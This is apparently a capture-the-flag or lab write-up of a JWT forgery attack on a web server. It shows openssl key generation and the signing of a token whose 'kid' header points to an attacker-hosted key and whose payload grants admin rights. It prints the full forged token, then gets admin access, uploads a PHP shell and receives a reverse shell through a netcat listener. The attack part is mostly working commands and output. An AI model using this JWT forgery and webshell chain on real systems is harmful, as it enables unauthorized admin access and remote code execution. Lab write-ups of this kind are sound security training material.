3 :80 JWT exploitation

Generating JWT

https://gist.github.com/ygotthilf/baa58da5c3dd1f69fae9
# RSA
openssl genrsa 2048 -out jwtRSA256-private.pem
You have a jwtRSA256-private.pem private key in PEM format.
Extract a public key from the private key.
openssl rsa -in jwtRSA256-private.pem -pubout -outform PEM -out jwtRSA256-public.pem

Using https://learn.akamai.com/en-us/webhelp/iot/jwt-access-control/GUID-CB17F8FF-3367-4D4B-B3FE-FDBA53A5EA02.html
# header
echo -n '{"typ": "JWT","alg": "RS256","kid": "http://10.10.14.2/jwtRS256.key"}' | base64 | sed s/\+/-/ | sed -E s/=+$//

# payload
echo -n '{"username": "kashz","email": "kashz@local.host","admin_cap": 1}' | base64 | sed s/\+/-/ | sed -E s/=+$//

# header
eyJ0eXAiOiAiSldUIiwiYWxnIjogIlJTMjU2Iiwia2lkIjogImh0dHA6Ly8xMC4xMC4xNC4yL2p3dFJTMjU2LmtleSJ9

# payload
eyJ1c2VybmFtZSI6ICJrYXNoeiIsImVtYWlsIjogImthc2h6QGxvY2FsLmhvc3QiLCJhZG1pbl9jYXAiOiAxfQ

# signature
echo -n "eyJ0eXAiOiAiSldUIiwiYWxnIjogIlJTMjU2Iiwia2lkIjogImh0dHA6Ly8xMC4xMC4xNC4yL2p3dFJTMjU2LmtleSJ9.eyJ1c2VybmFtZSI6ICJrYXNoeiIsImVtYWlsIjogImthc2h6QGxvY2FsLmhvc3QiLCJhZG1pbl9jYXAiOiAxfQ" | openssl dgst -sha256 -binary -sign jwtRS256.key | openssl enc -base64 | tr -d '\n=' | tr -- '+/' '-_'
iISvM2pXcrPLGub06Bf0t0WH2vin_GuqnN6j6sII1b6AalPkLmAuMxdNobHnaEfwi5lzeKx3IBhzbtTgUHwB_Eijpns8cW4u15cpO7pW_Om2YoflXSn2jl9NmAKSc3rDytnnAeCZsGLdyZM-beKc8RoXoyzLHIm35aa01lG2V2898uHXtPY7IRY00etnvkQ8yVLUAvLC0rhJc8ew9bWhSC65AdBGelpcy8WhrPKXzZVtQJqyeX8nbXypwMbwznqGAaB9PR-7XJ7YuKe0ENd_-GOJ_9qKXfb42Lg6yw0kMeMJDroKZQJwQGcR0k-R9sq9ehIMExOxINfbSOkuAGajiPO65rxPAr40objxngn_-WLksTWsJ94jVc3Xuyw-WRtjqQWY4aBDTGIX9YO90v4hXNsjUw5y98Bis19Altgw_PhblOo1l1Eu42RXVMuHRhs79g5a-0kZ1XqI0aOJqwRyJNg8EaY4I1xeJidmAjH_R4kJWTO4NeS5-QZl1SbpuIGzJ3XwGfPNl8QGqQ1yQL4zxK-bwtP0iBnuZBBkq_pwVw6CvqkR9PloTrIH1Jh6tbYhYvm1FBsAiKD7cGCWfNP-N_cDJKGl10CY64DW2o-L8BF5OD-sbnUK4YAtcVYyRsQHZ1_1yLHlk56AH8M3TQVjRiAoaMcM8JXn1-d1Q39O-7c

# JWT
eyJ0eXAiOiAiSldUIiwiYWxnIjogIlJTMjU2Iiwia2lkIjogImh0dHA6Ly8xMC4xMC4xNC4yL2p3dFJTMjU2LmtleSJ9.eyJ1c2VybmFtZSI6ICJrYXNoeiIsImVtYWlsIjogImthc2h6QGxvY2FsLmhvc3QiLCJhZG1pbl9jYXAiOiAxfQ.iISvM2pXcrPLGub06Bf0t0WH2vin_GuqnN6j6sII1b6AalPkLmAuMxdNobHnaEfwi5lzeKx3IBhzbtTgUHwB_Eijpns8cW4u15cpO7pW_Om2YoflXSn2jl9NmAKSc3rDytnnAeCZsGLdyZM-beKc8RoXoyzLHIm35aa01lG2V2898uHXtPY7IRY00etnvkQ8yVLUAvLC0rhJc8ew9bWhSC65AdBGelpcy8WhrPKXzZVtQJqyeX8nbXypwMbwznqGAaB9PR-7XJ7YuKe0ENd_-GOJ_9qKXfb42Lg6yw0kMeMJDroKZQJwQGcR0k-R9sq9ehIMExOxINfbSOkuAGajiPO65rxPAr40objxngn_-WLksTWsJ94jVc3Xuyw-WRtjqQWY4aBDTGIX9YO90v4hXNsjUw5y98Bis19Altgw_PhblOo1l1Eu42RXVMuHRhs79g5a-0kZ1XqI0aOJqwRyJNg8EaY4I1xeJidmAjH_R4kJWTO4NeS5-QZl1SbpuIGzJ3XwGfPNl8QGqQ1yQL4zxK-bwtP0iBnuZBBkq_pwVw6CvqkR9PloTrIH1Jh6tbYhYvm1FBsAiKD7cGCWfNP-N_cDJKGl10CY64DW2o-L8BF5OD-sbnUK4YAtcVYyRsQHZ1_1yLHlk56AH8M3TQVjRiAoaMcM8JXn1-d1Q39O-7c

Using this JWT, we get access to /admin > Admin Panel > Upload File Uploading shell.php

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.230] 36950
SOCKET: Shell has connected! PID: 18028
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Last updated